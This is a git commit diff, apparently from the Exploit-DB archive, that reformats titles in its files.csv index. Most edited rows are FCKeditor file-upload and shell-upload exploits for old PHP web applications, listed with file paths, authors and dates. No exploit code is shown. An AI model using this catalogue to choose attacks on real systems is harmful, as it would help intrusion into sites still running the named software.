DB: 2015-07-30

4 new exploits
2015-07-30 05:02:27 +00:00 · 2015-07-30 05:02:27 +00:00 · 95ce541193
commit 95ce541193
parent 7c8d57574c
30 changed files with 2652 additions and 2176 deletions
--- a/files.csv
+++ b/files.csv
@ -1226,7 +1226,7 @@ id,file,description,date,author,platform,type,port
 1481,platforms/qnx/local/1481.sh,"QNX RTOS 6.3.0 Insecure rc.local Permissions Plus System Crash Exploit",2006-02-08,kokanin,qnx,local,0
 1482,platforms/php/webapps/1482.php,"SPIP <= 1.8.2g Remote Commands Execution Exploit",2006-02-08,rgod,php,webapps,0
 1483,platforms/multiple/dos/1483.pl,"Half-Life CSTRIKE Server <= 1.6 (non steam) Denial of Service Exploit",2006-02-11,Firestorm,multiple,dos,0
-1484,platforms/php/webapps/1484.php,"FCKEditor 2.0 <= 2.2 (connector.php) - Remote Shell Upload Exploit",2006-02-09,rgod,php,webapps,0
+1484,platforms/php/webapps/1484.php,"FCKEditor 2.0 <= 2.2 - (FileManager - connector.php) Remote Shell Upload Exploit",2006-02-09,rgod,php,webapps,0
 1485,platforms/php/webapps/1485.php,"RunCMS <= 1.2 (class.forumposts.php) Arbitrary Remote Inclusion Exploit",2006-02-09,rgod,php,webapps,0
 1486,platforms/linux/remote/1486.c,"Power Daemon <= 2.0.2 (WHATIDO) Remote Format String Exploit",2006-02-10,"Gotfault Security",linux,remote,532
 1487,platforms/linux/remote/1487.c,"OpenVMPSd <= 1.3 - Remote Format String Exploit (Multiple Targets)",2006-02-10,"Gotfault Security",linux,remote,1589
@ -1671,7 +1671,7 @@ id,file,description,date,author,platform,type,port
 1961,platforms/php/webapps/1961.txt,"XOOPS myAds Module (lid) Remote SQL Injection Vulnerability",2006-06-28,KeyCoder,php,webapps,0
 1962,platforms/osx/local/1962.pl,"Mac OS X <= 10.4.6 (launchd) Local Format String Exploit (x86)",2006-06-28,"Kevin Finisterre",osx,local,0
 1963,platforms/php/webapps/1963.txt,"GeekLog <= 1.4.0sr3 (_CONF[path]) Remote File Include Vulnerabilities",2006-06-29,Kw3[R]Ln,php,webapps,0
-1964,platforms/php/webapps/1964.php,"GeekLog <= 1.4.0sr3 f(u)ckeditor - Remote Code Execution Exploit",2006-06-29,rgod,php,webapps,0
+1964,platforms/php/webapps/1964.php,"GeekLog <= 1.4.0sr3 - 'f(u)ckeditor' Remote Code Execution Exploit",2006-06-29,rgod,php,webapps,0
 1965,platforms/windows/remote/1965.pm,"Microsoft Windows - RRAS RASMAN Registry Stack Overflow Exploit (MS06-025)",2006-06-29,Pusscat,windows,remote,445
 1967,platforms/windows/dos/1967.c,"Microsoft Windows TCP/IP Protocol Driver Remote Buffer Overflow Exploit",2006-06-30,Preddy,windows,dos,0
 1968,platforms/php/webapps/1968.php,"deV!Lz Clanportal [DZCP] <= 1.34 (id) Remote SQL Injection Exploit",2006-07-01,x128,php,webapps,0
@ -1740,7 +1740,7 @@ id,file,description,date,author,platform,type,port
 2032,platforms/php/webapps/2032.pl,"Eskolar CMS 0.9.0.0 - Remote Blind SQL Injection Exploit",2006-07-18,"Jacek Wlodarczyk",php,webapps,0
 2033,platforms/php/webapps/2033.pl,"Invision Power Board 2.1 <= 2.1.6 - Remote SQL Injection Exploit (2)",2006-07-18,"w4g.not null",php,webapps,0
 2034,platforms/hardware/remote/2034.txt,"BT Voyager 2091 (Wireless ADSL) - Multiple Vulnerabilities",2006-07-18,"Adrian ""pagvac"" Pastor",hardware,remote,0
-2035,platforms/php/webapps/2035.php,"toendaCMS <= 1.0.0 (FCKeditor) Remote File Upload Exploit",2006-07-18,rgod,php,webapps,0
+2035,platforms/php/webapps/2035.php,"toendaCMS <= 1.0.0 - (FCKeditor) Remote File Upload Exploit",2006-07-18,rgod,php,webapps,0
 2036,platforms/php/webapps/2036.txt,"PHP-Post 1.0 Cookie Modification Privilege Escalation Vulnerability",2006-07-18,FarhadKey,php,webapps,0
 2037,platforms/windows/dos/2037.c,"Dumb <= 0.9.3 (it_read_envelope) Remote Heap Overflow PoC",2006-07-19,"Luigi Auriemma",windows,dos,0
 2039,platforms/windows/dos/2039.pl,"Microsoft Internet Explorer 6 (Content-Type) Stack Overflow Crash",2006-07-20,Firestorm,windows,dos,0
@ -2394,7 +2394,7 @@ id,file,description,date,author,platform,type,port
 2702,platforms/php/webapps/2702.php,"Lithium CMS <= 4.04c (classes/index.php) Local File Include Exploit",2006-11-02,Kacper,php,webapps,0
 2703,platforms/php/webapps/2703.txt,"Article System 0.6 (volume.php) Remote File Include Vulnerability",2006-11-02,GregStar,php,webapps,0
 2704,platforms/php/webapps/2704.txt,"freewebshop.org script <= 2.2.2 - Multiple Vulnerabilities",2006-11-02,Spiked,php,webapps,0
-2706,platforms/php/webapps/2706.txt,"MODx CMS <= 0.9.2.1 (FCKeditor) Remote File Include Vulnerability",2006-11-03,nuffsaid,php,webapps,0
+2706,platforms/php/webapps/2706.txt,"MODx CMS <= 0.9.2.1 - (FCKeditor) Remote File Include Vulnerability",2006-11-03,nuffsaid,php,webapps,0
 2707,platforms/php/webapps/2707.php,"PostNuke <= 0.763 (PNSV lang) Remote Code Execution Exploit",2006-11-03,Kacper,php,webapps,0
 2708,platforms/windows/dos/2708.c,"Nullsoft Winamp <= 5.3 - (Ultravox-Max-Msg) Heap Overflow DoS PoC",2006-11-03,cocoruder,windows,dos,0
 2709,platforms/php/webapps/2709.txt,"Creasito E-Commerce Content Manager (admin) Authentication Bypass",2006-11-03,SlimTim10,php,webapps,0
@ -5241,7 +5241,7 @@ id,file,description,date,author,platform,type,port
 5615,platforms/php/webapps/5615.txt,"AS-GasTracker 1.0.0 Insecure Cookie Handling Vulnerability",2008-05-14,t0pP8uZz,php,webapps,0
 5616,platforms/php/webapps/5616.txt,"ActiveKB <= 1.5 Insecure Cookie Handling/Arbitrary Admin Access",2008-05-14,t0pP8uZz,php,webapps,0
 5617,platforms/php/webapps/5617.txt,"Internet Photoshow (Special Edition) - Insecure Cookie Handling Vuln",2008-05-14,t0pP8uZz,php,webapps,0
-5618,platforms/php/webapps/5618.txt,"La-Nai CMS <= 1.2.16 (fckeditor) Arbitrary File Upload Exploit",2008-05-14,EgiX,php,webapps,0
+5618,platforms/php/webapps/5618.txt,"La-Nai CMS <= 1.2.16 - (fckeditor) Arbitrary File Upload Exploit",2008-05-14,EgiX,php,webapps,0
 5619,platforms/windows/remote/5619.html,"Microsoft Internet Explorer (Print Table of Links) Cross-Zone Scripting PoC",2008-05-14,"Aviv Raff",windows,remote,0
 5620,platforms/php/webapps/5620.txt,"rgboard <= 3.0.12 (rfi/XSS) Multiple Vulnerabilities",2008-05-14,e.wiZz!,php,webapps,0
 5621,platforms/php/webapps/5621.txt,"Kostenloses Linkmanagementscript (page_to_include) RFI Vulnerability",2008-05-14,HaCkeR_EgY,php,webapps,0
@ -5310,16 +5310,16 @@ id,file,description,date,author,platform,type,port
 5684,platforms/php/webapps/5684.txt,"Joomla Component Artist (idgalery) SQL Injection Vulnerability",2008-05-28,Cr@zy_King,php,webapps,0
 5685,platforms/php/webapps/5685.txt,"FlashBlog (articulo_id) Remote SQL Injection Vulnerability",2008-05-28,HER0,php,webapps,0
 5687,platforms/windows/dos/5687.txt,"Adobe Acrobat Reader <= 8.1.2 - Malformed PDF Remote DoS PoC",2008-05-29,securfrog,windows,dos,0
-5688,platforms/php/webapps/5688.php,"SyntaxCMS <= 1.3 (fckeditor) Arbitrary File Upload Exploit",2008-05-29,Stack,php,webapps,0
+5688,platforms/php/webapps/5688.php,"SyntaxCMS <= 1.3 - (fckeditor) Arbitrary File Upload Exploit",2008-05-29,Stack,php,webapps,0
 5689,platforms/php/webapps/5689.txt,"AirvaeCommerce 3.0 (pid) Remote SQL Injection Vulnerability",2008-05-29,QTRinux,php,webapps,0
 5690,platforms/php/webapps/5690.txt,"PicoFlat CMS 0.5.9 - Local File Inclusion Vulnerabilitty (win)",2008-05-29,gmda,php,webapps,0
-5691,platforms/php/webapps/5691.php,"CMS from Scratch <= 1.1.3 (fckeditor) Remote Shell Upload Exploit",2008-05-29,EgiX,php,webapps,0
+5691,platforms/php/webapps/5691.php,"CMS from Scratch <= 1.1.3 - (fckeditor) Remote Shell Upload Exploit",2008-05-29,EgiX,php,webapps,0
 5692,platforms/php/webapps/5692.pl,"Mambo Component mambads <= 1.0 RC1 Beta SQL Injection Vulnerability",2008-05-29,Houssamix,php,webapps,0
 5693,platforms/php/webapps/5693.txt,"CMS from Scratch <= 1.1.3 (image.php) Directory Traversal Vulnerability",2008-05-29,Stack,php,webapps,0
 5694,platforms/windows/remote/5694.cpp,"ASUS DPC Proxy 2.0.0.16/19 - Remote Buffer Overflow Exploit",2008-05-29,Heretic2,windows,remote,623
 5695,platforms/windows/remote/5695.cpp,"Now SMS/Mms Gateway 5.5 - Remote Buffer Overflow Exploit",2008-05-29,Heretic2,windows,remote,8800
 5696,platforms/php/webapps/5696.pl,"PHP Booking Calendar 10 d Remote SQL Injection Exploit",2008-05-29,Stack,php,webapps,0
-5697,platforms/php/webapps/5697.php,"PHP Booking Calendar 10 d (fckeditor) Arbitrary File Upload Exploit",2008-05-29,Stack,php,webapps,0
+5697,platforms/php/webapps/5697.php,"PHP Booking Calendar 10 d - (fckeditor) Arbitrary File Upload Exploit",2008-05-29,Stack,php,webapps,0
 5698,platforms/php/webapps/5698.txt,"HiveMaker Professional <= 1.0.2 (cid) SQL Injection Vulnerability",2008-05-30,K-159,php,webapps,0
 5699,platforms/php/webapps/5699.txt,"PsychoStats <= 2.3.3 - Multiple Remote SQL Injection Vulnerabilities",2008-05-31,Mr.SQL,php,webapps,0
 5700,platforms/php/webapps/5700.htm,"CMSimple 3.1 - Local File Inclusion / Arbitrary File Upload Exploit",2008-05-31,irk4z,php,webapps,0
@ -5390,7 +5390,7 @@ id,file,description,date,author,platform,type,port
 5767,platforms/php/webapps/5767.php,"Flux CMS <= 1.5.0 (loadsave.php) Remote Arbitrary File Overwrite Exploit",2008-06-09,EgiX,php,webapps,0
 5768,platforms/php/webapps/5768.txt,"pNews 2.08 (shownews) Remote SQL Injection Vulnerability",2008-06-09,Cr@zy_King,php,webapps,0
 5769,platforms/php/webapps/5769.pl,"Telephone Directory 2008 - Arbitrary Delete Contact Exploit",2008-06-09,Stack,php,webapps,0
-5770,platforms/php/webapps/5770.php,"Achievo <= 1.3.2 (fckeditor) Arbitrary File Upload Exploit",2008-06-09,EgiX,php,webapps,0
+5770,platforms/php/webapps/5770.php,"Achievo <= 1.3.2 - (fckeditor) Arbitrary File Upload Exploit",2008-06-09,EgiX,php,webapps,0
 5771,platforms/php/webapps/5771.txt,"ErfurtWiki <= R1.02b (css) Local File Inclusion Vulnerabilities",2008-06-10,Unohope,php,webapps,0
 5772,platforms/php/webapps/5772.txt,"DCFM Blog 0.9.4 (comments) Remote SQL Injection Vulnerability",2008-06-10,Unohope,php,webapps,0
 5773,platforms/php/webapps/5773.txt,"yblog 0.2.2.2 (xss/SQL) Multiple Vulnerabilities",2008-06-10,Unohope,php,webapps,0
@ -5463,7 +5463,7 @@ id,file,description,date,author,platform,type,port
 5841,platforms/php/webapps/5841.txt,"ThaiQuickCart (sLanguage) Local File Inclusion Vulnerability",2008-06-17,"CWH Underground",php,webapps,0
 5842,platforms/php/webapps/5842.txt,"PHP Site Lock 2.0 (index.php page) Remote SQL Injection Vulnerability",2008-06-17,Mr.SQL,php,webapps,0
 5843,platforms/windows/dos/5843.html,"P2P Foxy Out of Memory Denial of Service Exploit",2008-06-17,Styxosaurus,windows,dos,0
-5844,platforms/php/webapps/5844.php,"FreeCMS.us 0.2 (fckeditor) Arbitrary File Upload Exploit",2008-06-17,Stack,php,webapps,0
+5844,platforms/php/webapps/5844.php,"FreeCMS.us 0.2 - (fckeditor) Arbitrary File Upload Exploit",2008-06-17,Stack,php,webapps,0
 5845,platforms/php/webapps/5845.txt,"MyShoutPro 1.2 Final Insecure Cookie Handling Vulnerability",2008-06-17,Stack,php,webapps,0
 5846,platforms/php/webapps/5846.txt,"eroCMS <= 1.4 (index.php site) SQL Injection Vulnerability",2008-06-17,Mr.SQL,php,webapps,0
 5847,platforms/php/webapps/5847.txt,"WebCalendar 1.0.4 (includedir) Remote File Inclusion Vulnerability",2008-06-17,Cr@zy_King,php,webapps,0
@ -5525,7 +5525,7 @@ id,file,description,date,author,platform,type,port
 5904,platforms/php/webapps/5904.txt,"Hedgehog-CMS 1.21 (header.php) Local File Inclusion Vulnerability",2008-06-22,CraCkEr,php,webapps,0
 5905,platforms/php/webapps/5905.txt,"cmreams CMS 1.3.1.1 beta2 - (LFI/XSS) Multiple Vulnerabilities",2008-06-22,CraCkEr,php,webapps,0
 5906,platforms/php/webapps/5906.txt,"odars CMS 1.0.2 - Remote File Inclusion Vulnerability",2008-06-22,CraCkEr,php,webapps,0
-5907,platforms/php/webapps/5907.pl,"emuCMS 0.3 (fckeditor) Arbitrary File Upload Exploit",2008-06-23,Stack,php,webapps,0
+5907,platforms/php/webapps/5907.pl,"emuCMS 0.3 - (fckeditor) Arbitrary File Upload Exploit",2008-06-23,Stack,php,webapps,0
 5908,platforms/php/webapps/5908.txt,"HoMaP-CMS 0.1 (index.php go) Remote SQL Injection Vulnerability",2008-06-23,SxCx,php,webapps,0
 5909,platforms/php/webapps/5909.pl,"BlogPHP 2.0 - Remote Privilege Escalation Exploit",2008-06-23,Cod3rZ,php,webapps,0
 5910,platforms/php/webapps/5910.txt,"Ready2Edit (pages.php menuid) Remote SQL Injection Vulnerability",2008-06-23,Mr.SQL,php,webapps,0
@ -5540,8 +5540,8 @@ id,file,description,date,author,platform,type,port
 5919,platforms/php/webapps/5919.txt,"mm chat 1.5 - (LFI/XSS) Multiple Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0
 5920,platforms/php/webapps/5920.txt,"ourvideo CMS 9.5 (rfi/lfi/XSS) Multiple Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0
 5921,platforms/php/webapps/5921.txt,"cmsWorks 2.2 RC4 (mod_root) Remote File Inclusion Vulnerability",2008-06-23,CraCkEr,php,webapps,0
-5922,platforms/php/webapps/5922.php,"cmsWorks 2.2 RC4 (fckeditor) Remote Arbitrary File Upload Exploit",2008-06-23,Stack,php,webapps,0
+5922,platforms/php/webapps/5922.php,"cmsWorks 2.2 RC4 - (fckeditor) Remote Arbitrary File Upload Exploit",2008-06-23,Stack,php,webapps,0
-5923,platforms/php/webapps/5923.pl,"Demo4 CMS 1b (fckeditor) Arbitrary File Upload Exploit",2008-06-23,Stack,php,webapps,0
+5923,platforms/php/webapps/5923.pl,"Demo4 CMS 1b - (fckeditor) Arbitrary File Upload Exploit",2008-06-23,Stack,php,webapps,0
 5924,platforms/php/webapps/5924.txt,"Relative Real Estate Systems <= 3.0 (listing_id) SQL Injection Vuln",2008-06-24,K-159,php,webapps,0
 5925,platforms/php/webapps/5925.txt,"ShareCMS 0.1 - Multiple Remote SQL Injection Vulnerabilities",2008-06-24,"CWH Underground",php,webapps,0
 5926,platforms/hardware/remote/5926.txt,"Linksys WRT54G (firmware 1.00.9) Security Bypass Vulnerabilities (2)",2008-06-24,meathive,hardware,remote,0
@ -5562,7 +5562,7 @@ id,file,description,date,author,platform,type,port
 5941,platforms/php/webapps/5941.txt,"polypager <= 1.0rc2 (sql/XSS) Multiple Vulnerabilities",2008-06-26,"CWH Underground",php,webapps,0
 5942,platforms/php/webapps/5942.txt,"PHP-Fusion Mod Kroax <= 4.42 (category) SQL Injection Vulnerability",2008-06-26,boom3rang,php,webapps,0
 5944,platforms/php/webapps/5944.txt,"Galmeta Post CMS 0.2 - Multiple Local File Inclusion Vulnerabilities",2008-06-26,"CWH Underground",php,webapps,0
-5945,platforms/php/webapps/5945.txt,"Seagull PHP Framework <= 0.6.4 (fckeditor) Arbitrary File Upload Exploit",2008-06-26,EgiX,php,webapps,0
+5945,platforms/php/webapps/5945.txt,"Seagull PHP Framework <= 0.6.4 - (fckeditor) Arbitrary File Upload Exploit",2008-06-26,EgiX,php,webapps,0
 5946,platforms/php/webapps/5946.txt,"Riddles Complete Website 1.2.1 (riddleid) SQL Injection Vulnerability",2008-06-26,InjEctOr5,php,webapps,0
 5947,platforms/php/webapps/5947.txt,"Tips Complete Website 1.2.0 (tipid) SQL Injection Vulnerability",2008-06-26,InjEctOr5,php,webapps,0
 5948,platforms/php/webapps/5948.txt,"Jokes Complete Website 2.1.3 (jokeid) SQL Injection Vulnerability",2008-06-26,InjEctOr5,php,webapps,0
@ -5620,7 +5620,7 @@ id,file,description,date,author,platform,type,port
 6002,platforms/php/webapps/6002.pl,"Joomla Component altas 1.0 - Multiple Remote SQL Injection Exploit",2008-07-04,Houssamix,php,webapps,0
 6003,platforms/php/webapps/6003.txt,"Joomla Component DBQuery <= 1.4.1.1 RFI Vulnerability",2008-07-04,SsEs,php,webapps,0
 6004,platforms/windows/remote/6004.txt,"Panda Security ActiveScan 2.0 (Update) - Remote BoF Exploit",2008-07-04,"Karol Wiesek",windows,remote,0
-6005,platforms/php/webapps/6005.php,"Site@School <= 2.4.10 (fckeditor) Session Hijacking / File Upload Exploit",2008-07-04,EgiX,php,webapps,0
+6005,platforms/php/webapps/6005.php,"Site@School <= 2.4.10 - (fckeditor) Session Hijacking / File Upload Exploit",2008-07-04,EgiX,php,webapps,0
 6006,platforms/php/webapps/6006.php,"Thelia 1.3.5 - Multiple Vulnerabilities Exploit",2008-07-05,BlackH,php,webapps,0
 6007,platforms/php/webapps/6007.txt,"Kasseler CMS 1.3.0 - (LFI/XSS) Multiple Vulnerabilities",2008-07-05,Cr@zy_King,php,webapps,0
 6008,platforms/php/webapps/6008.php,"ImperialBB <= 2.3.5 - Remote File Upload Exploit",2008-07-05,PHPLizardo,php,webapps,0
@ -5927,7 +5927,7 @@ id,file,description,date,author,platform,type,port
 6341,platforms/php/webapps/6341.txt,"WeBid 0.5.4 (item.php id) Remote SQL Injection Vulnerability",2008-09-01,Stack,php,webapps,0
 6342,platforms/php/webapps/6342.txt,"EasyClassifields 3.0 (go) Remote SQL Injection Vulnerability",2008-09-01,e.wiZz!,php,webapps,0
 6343,platforms/php/webapps/6343.txt,"CMSbright (id_rub_page) Remote SQL Injection Vulnerability",2008-09-01,"BorN To K!LL",php,webapps,0
-6344,platforms/php/webapps/6344.php,"WeBid 0.5.4 (fckeditor) Remote Arbitrary File Upload Exploit",2008-09-01,Stack,php,webapps,0
+6344,platforms/php/webapps/6344.php,"WeBid 0.5.4 - (fckeditor) Remote Arbitrary File Upload Exploit",2008-09-01,Stack,php,webapps,0
 6345,platforms/windows/dos/6345.html,"VMware COM API ActiveX Remote Buffer Overflow PoC",2008-09-01,shinnai,windows,dos,0
 6346,platforms/php/webapps/6346.pl,"e107 Plugin BLOG Engine 2.2 (uid) SQL Injection Exploit",2008-09-01,"Virangar Security",php,webapps,0
 6347,platforms/php/webapps/6347.txt,"myPHPNuke < 1.8.8_8rc2 (artid) SQL Injection Vulnerability",2008-09-02,MustLive,php,webapps,0
@ -5941,7 +5941,7 @@ id,file,description,date,author,platform,type,port
 6355,platforms/windows/remote/6355.txt,"Google Chrome Browser 0.2.149.27 Automatic File Download Exploit",2008-09-03,nerex,windows,remote,0
 6356,platforms/php/webapps/6356.php,"Moodle <= 1.8.4 - Remote Code Execution Exploit",2008-09-03,zurlich.lpt,php,webapps,0
 6357,platforms/php/webapps/6357.txt,"aspwebalbum 3.2 (upload/sql/XSS) Multiple Vulnerabilities",2008-09-03,Alemin_Krali,php,webapps,0
-6360,platforms/php/webapps/6360.txt,"TransLucid 1.75 (fckeditor) Remote Arbitrary File Upload Vulnerability",2008-09-03,BugReport.IR,php,webapps,0
+6360,platforms/php/webapps/6360.txt,"TransLucid 1.75 - (fckeditor) Remote Arbitrary File Upload Vulnerability",2008-09-03,BugReport.IR,php,webapps,0
 6361,platforms/php/webapps/6361.txt,"Living Local Website (listtest.php r) SQL Injection Vulnerability",2008-09-03,"Hussin X",php,webapps,0
 6362,platforms/php/webapps/6362.txt,"ACG-PTP 1.0.6 (adid) Remote SQL Injection Vulnerability",2008-09-04,"Hussin X",php,webapps,0
 6363,platforms/php/webapps/6363.txt,"qwicsite pro (sql/XSS) Multiple Vulnerabilities",2008-09-04,Cr@zy_King,php,webapps,0
@ -5987,14 +5987,14 @@ id,file,description,date,author,platform,type,port
 6407,platforms/windows/remote/6407.c,"Microworld Mailscan 5.6.a Password Reveal Exploit",2008-09-09,SlaYeR,windows,remote,0
 6408,platforms/php/webapps/6408.txt,"CMS Buzz (id) Remote SQL Injection Vulnerability",2008-09-09,"security fears team",php,webapps,0
 6409,platforms/php/webapps/6409.txt,"Availscript Article Script (articles.php) Multiple Vulnerabilities",2008-09-09,sl4xUz,php,webapps,0
-6410,platforms/php/webapps/6410.txt,"Kim Websites 1.0 (fckeditor) Remote Arbitrary File Upload Vulnerability",2008-09-09,Ciph3r,php,webapps,0
+6410,platforms/php/webapps/6410.txt,"Kim Websites 1.0 - (fckeditor) Remote Arbitrary File Upload Vulnerability",2008-09-09,Ciph3r,php,webapps,0
 6411,platforms/php/webapps/6411.txt,"Availscript Photo Album (pics.php) Multiple Vulnerabilities",2008-09-09,sl4xUz,php,webapps,0
 6412,platforms/php/webapps/6412.txt,"Availscript Classmate Script (viewprofile.php) SQL Injection Vulnerability",2008-09-09,Stack,php,webapps,0
 6413,platforms/php/webapps/6413.txt,"Zanfi CMS lite 1.2 - Multiple Local File Inclusion Vulnerabilities",2008-09-10,SirGod,php,webapps,0
 6414,platforms/windows/remote/6414.html,"Peachtree Accounting 2004 (PAWWeb11.ocx) ActiveX Insecure Method",2008-09-10,"Jeremy Brown",windows,remote,0
 6416,platforms/php/webapps/6416.txt,"Libera CMS <= 1.12 (Cookie) Remote SQL Injection Exploit",2008-09-10,StAkeR,php,webapps,0
 6417,platforms/php/webapps/6417.txt,"Availscript Jobs Portal Script (jid) SQL Injection Vulnerability (auth)",2008-09-10,InjEctOr5,php,webapps,0
-6419,platforms/php/webapps/6419.txt,"Zanfi CMS lite / Jaw Portal free (fckeditor) Arbitrary File Upload Vuln",2008-09-10,reptil,php,webapps,0
+6419,platforms/php/webapps/6419.txt,"Zanfi CMS lite 2.1 / Jaw Portal free - (fckeditor) Arbitrary File Upload Vuln",2008-09-10,reptil,php,webapps,0
 6420,platforms/asp/webapps/6420.txt,"aspwebalbum 3.2 - Multiple Vulnerabilities",2008-09-10,e.wiZz!,asp,webapps,0
 6421,platforms/php/webapps/6421.php,"Wordpress 2.6.1 - (SQL Column Truncation) Admin Takeover Exploit",2008-09-10,iso^kpsbr,php,webapps,0
 6422,platforms/php/webapps/6422.txt,"phpvid 1.1 (xss/SQL) Multiple Vulnerabilities",2008-09-10,r45c4l,php,webapps,0
@ -6021,7 +6021,7 @@ id,file,description,date,author,platform,type,port
 6445,platforms/php/webapps/6445.txt,"SkaLinks 1.5 (register.php) Remote Arbitrary Add Editor Vulnerability",2008-09-12,mr.al7rbi,php,webapps,0
 6446,platforms/php/webapps/6446.txt,"vbLOGIX Tutorial Script <= 1.0 (cat_id) SQL Injection Vulnerability",2008-09-12,FIREH4CK3R,php,webapps,0
 6447,platforms/php/webapps/6447.txt,"pNews 2.03 (newsid) Remote SQL Injection Vulnerability",2008-09-12,r45c4l,php,webapps,0
-6448,platforms/php/webapps/6448.txt,"WebPortal CMS <= 0.7.4 (fckeditor) Arbitrary File Upload Vulnerability",2008-09-12,S.W.A.T.,php,webapps,0
+6448,platforms/php/webapps/6448.txt,"WebPortal CMS <= 0.7.4 - (fckeditor) Arbitrary File Upload Vulnerability",2008-09-12,S.W.A.T.,php,webapps,0
 6449,platforms/php/webapps/6449.php,"pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit",2008-09-13,Stack,php,webapps,0
 6450,platforms/php/webapps/6450.pl,"Sports Clubs Web Panel 0.0.1 - Remote Game Delete Exploit",2008-09-13,ka0x,php,webapps,0
 6451,platforms/php/webapps/6451.txt,"Talkback 2.3.6 - Multiple Local File Inclusion/PHPInfo Disclosure Vulns",2008-09-13,SirGod,php,webapps,0
@ -6143,7 +6143,7 @@ id,file,description,date,author,platform,type,port
 6570,platforms/windows/remote/6570.rb,"ICONICS Vessel / Gauge / Switch 8.02.140 - ActiveX BoF Exploit (meta)",2008-09-25,"Kevin Finisterre",windows,remote,0
 6571,platforms/php/webapps/6571.txt,"openengine <= 2.0 beta4 - Remote File Inclusion Vulnerability",2008-09-25,dun,php,webapps,0
 6572,platforms/php/webapps/6572.txt,"Atomic Photo Album 1.1.0pre4 (XSS/SQL) Remote Vulnerabilities",2008-09-25,d3v1l,php,webapps,0
-6573,platforms/php/webapps/6573.pl,"LanSuite 3.3.2 (fckeditor) Arbitrary File Upload Exploit",2008-09-25,Stack,php,webapps,0
+6573,platforms/php/webapps/6573.pl,"LanSuite 3.3.2 - (fckeditor) Arbitrary File Upload Exploit",2008-09-25,Stack,php,webapps,0
 6574,platforms/php/webapps/6574.php,"Atomic Photo Album 1.1.0pre4 - Blind SQL Injection Exploit",2008-09-26,Stack,php,webapps,0
 6575,platforms/php/webapps/6575.txt,"barcodegen <= 2.0.0 (class_dir) Remote File Inclusion Vulnerability",2008-09-26,"Br0k3n H34rT",php,webapps,0
 6576,platforms/php/webapps/6576.txt,"Ultimate Webboard 3.00 (Category) SQL Injection Vulnerability",2008-09-26,"CWH Underground",php,webapps,0
@ -6348,7 +6348,7 @@ id,file,description,date,author,platform,type,port
 6780,platforms/php/webapps/6780.txt,"zeeproperty (adid) Remote SQL Injection Vulnerability",2008-10-18,"Hussin X",php,webapps,0
 6781,platforms/php/webapps/6781.pl,"Meeting Room Booking System (MRBS) < 1.4 - SQL Injection Exploit",2008-10-18,Xianur0,php,webapps,0
 6782,platforms/php/webapps/6782.php,"miniBloggie 1.0 (del.php) Remote Blind SQL Injection Exploit",2008-10-18,StAkeR,php,webapps,0
-6783,platforms/php/webapps/6783.php,"Nuke ET <= 3.4 (fckeditor) Remote Arbitrary File Upload Exploit",2008-10-18,EgiX,php,webapps,0
+6783,platforms/php/webapps/6783.php,"Nuke ET <= 3.4 - (fckeditor) Remote Arbitrary File Upload Exploit",2008-10-18,EgiX,php,webapps,0
 6784,platforms/php/webapps/6784.pl,"PHP Easy Downloader <= 1.5 - Remote File Creation Exploit",2008-10-18,StAkeR,php,webapps,0
 6785,platforms/php/webapps/6785.txt,"Fast Click SQL 1.1.7 Lite (init.php) Remote File Inclusion Vulnerability",2008-10-19,NoGe,php,webapps,0
 6786,platforms/solaris/remote/6786.pl,"Solaris 9 [UltraSPARC] sadmind Remote Root Exploit",2008-10-19,kingcope,solaris,remote,111
@ -6710,7 +6710,7 @@ id,file,description,date,author,platform,type,port
 7155,platforms/php/webapps/7155.txt,"Free Directory Script 1.1.1 (API_HOME_DIR) RFI Vulnerability",2008-11-18,"Ghost Hacker",php,webapps,0
 7156,platforms/php/webapps/7156.txt,"E-topbiz Link Back Checker 1 Insecure Cookie Handling Vulnerability",2008-11-18,x0r,php,webapps,0
 7157,platforms/php/webapps/7157.txt,"Alex News-Engine 1.5.1 - Remote Arbitrary File Upload Vulnerability",2008-11-19,Batter,php,webapps,0
-7158,platforms/php/webapps/7158.txt,"Alex Article-Engine 1.3.0 (fckeditor) Arbitrary File Upload Vulnerability",2008-11-19,Batter,php,webapps,0
+7158,platforms/php/webapps/7158.txt,"Alex Article-Engine 1.3.0 - (fckeditor) Arbitrary File Upload Vulnerability",2008-11-19,Batter,php,webapps,0
 7159,platforms/php/webapps/7159.php,"PunBB (Private Messaging System 1.2.x) - Multiple LFI Exploit",2008-11-19,StAkeR,php,webapps,0
 7160,platforms/php/webapps/7160.php,"MyTopix <= 1.3.0 (notes send) Remote SQL Injection Exploit",2008-11-19,cOndemned,php,webapps,0
 7162,platforms/php/webapps/7162.pl,"MauryCMS <= 0.53.2 - Remote Shell Upload Exploit",2008-11-19,StAkeR,php,webapps,0
@ -7586,7 +7586,7 @@ id,file,description,date,author,platform,type,port
 8057,platforms/php/webapps/8057.txt,"InselPhoto 1.1 Persistent XSS Vulnerability",2009-02-16,rAWjAW,php,webapps,0
 8058,platforms/windows/dos/8058.pl,"TPTEST <= 3.1.7 - Stack Buffer Overflow PoC",2009-02-16,ffwd,windows,dos,0
 8059,platforms/windows/remote/8059.html,"GeoVision LiveX 8200 - ActiveX (LIVEX_~1.OCX) File Corruption PoC",2009-02-16,Nine:Situations:Group,windows,remote,0
-8060,platforms/php/webapps/8060.php,"Falt4 CMS RC4 (fckeditor) Arbitrary File Upload Exploit",2009-02-16,Sp3shial,php,webapps,0
+8060,platforms/php/webapps/8060.php,"Falt4 CMS RC4 - (fckeditor) Arbitrary File Upload Exploit",2009-02-16,Sp3shial,php,webapps,0
 8061,platforms/php/webapps/8061.pl,"simplePms CMS <= 0.1.4 - LFI / Remote Command Execution Exploit",2009-02-16,Osirys,php,webapps,0
 8062,platforms/php/webapps/8062.txt,"powermovielist 0.14b (sql/XSS) Multiple Vulnerabilities",2009-02-16,brain[pillow],php,webapps,0
 8063,platforms/php/webapps/8063.txt,"novaboard 1.0.0 - Multiple Vulnerabilities",2009-02-16,brain[pillow],php,webapps,0
@ -10766,7 +10766,7 @@ id,file,description,date,author,platform,type,port
 11768,platforms/php/webapps/11768.txt,"Newbie CMS File Disclosure Vulnerability",2010-03-15,JIKO,php,webapps,0
 11769,platforms/hardware/dos/11769.py,"iPhone Springboard Malformed Character Crash PoC",2010-03-15,"Chase Higgins",hardware,dos,0
 11770,platforms/linux/dos/11770.txt,"WFTPD 3.3 - Remote REST DoS",2010-03-16,dmnt,linux,dos,21
